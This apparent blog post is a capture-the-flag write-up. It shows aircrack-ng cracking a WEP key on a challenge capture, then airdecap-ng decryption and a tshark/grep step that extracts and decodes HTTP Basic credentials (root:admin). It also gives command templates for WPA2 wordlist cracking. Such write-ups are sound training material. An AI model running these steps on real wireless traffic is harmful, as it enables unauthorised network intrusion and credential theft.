Saturday, August 10, 2013

Using aircrack-ng, airdecap-ng, tshark, and grep regex

Recently in a capture the flag event I had to utilize aircrack-ng to break the WEP key on a packet capture, then airdecap-ng to decrypt the contents of the WEP packets and export them to another packet capture, use tshark to output to text and then use a grep regular expression to extract base64 Authentication Basic username and passwords.

Below are the commands that I ran to accomplish this:

# aircrack-ng WIRELESS-C2.cap 
Opening WIRELESS-C2.cap
Read 73650 packets.

   #  BSSID              ESSID                     Encryption

   1  00:40:10:20:00:03  Wireless Challenge Two    WEP (25704 IVs)

Choosing first network as target.

Opening WIRELESS-C2.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 25704 ivs.

                                            Aircrack-ng 1.2 beta1

                            [00:00:00] Tested 397 keys (got 25082 IVs)

   KB    depth   byte(vote)
    0    2/  4   DA(31232) C0(30976) 22(30720) E8(30720) 16(30208) 25(30208) D0(30208) 
    1    0/  1   1C(35840) 03(32256) 7F(32000) B7(32000) F2(30464) 95(30208) 86(29952) 
    2    0/  5   91(34048) CC(33792) 2D(32512) 58(31232) 84(31232) 2F(30720) 3D(30720) 
    3    5/ 26   0A(30208) 39(30208) 5B(30208) 62(29952) ED(29696) 02(29696) 2E(29696) 
    4    0/  1   C4(35072) 19(31744) 31(30464) CD(30208) 10(29696) 6E(29696) D5(29696) 

                         KEY FOUND! [ C0:1C:91:0A:C4 ] 
        Decrypted correctly: 100%

# airdecap-ng -w c01c910ac4 WIRELESS-C2.cap

## Open up in Wireshark the WIRELESS-C2-dec.cap
## Add filter for (http.request.method == "GET") || (http.request.method == "POST")
## After the filter is applied find the management.asp page
## Right-click and follow TCP stream
## In the open window you find the "Authorization: Basic cm9vdDphZG1pbg=="
## The base64 encoding is the admin username and password
## Decoded the username and password is root:admin

## OR you can use tshark and export the packet information to a file

# tshark -V -r WIRELESS-C2-dec.cap > WIRELESS-dec.txt

## Then wrote a short and sweet regex to extract base64 encoded strings

# cat WIRELESS-C2-dec.txt | grep '\+*[A-Za-z0-9]\{11,\}\+='   # Find base64 encoded text that is 11 characters or longer

## Walla!  Authorization: Basic cm9vdDphZG1pbg==\r\n
## Then you can decode it from the command line by doing the following

echo "cm9vdDphZG1pbg==" | base64 -d

# Note on WPA2 packet captures
 #aircrack-ng <file>.cap -w Wordlist.txt - This is to find the password used

# Then to decrypt the packet capture
# airdecap-ng <file>.pcap -e <SSID> -p <password>

No comments:

Post a Comment

Docker with Juiceshop - Focus on SQL Injection

In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub or docker images to refr...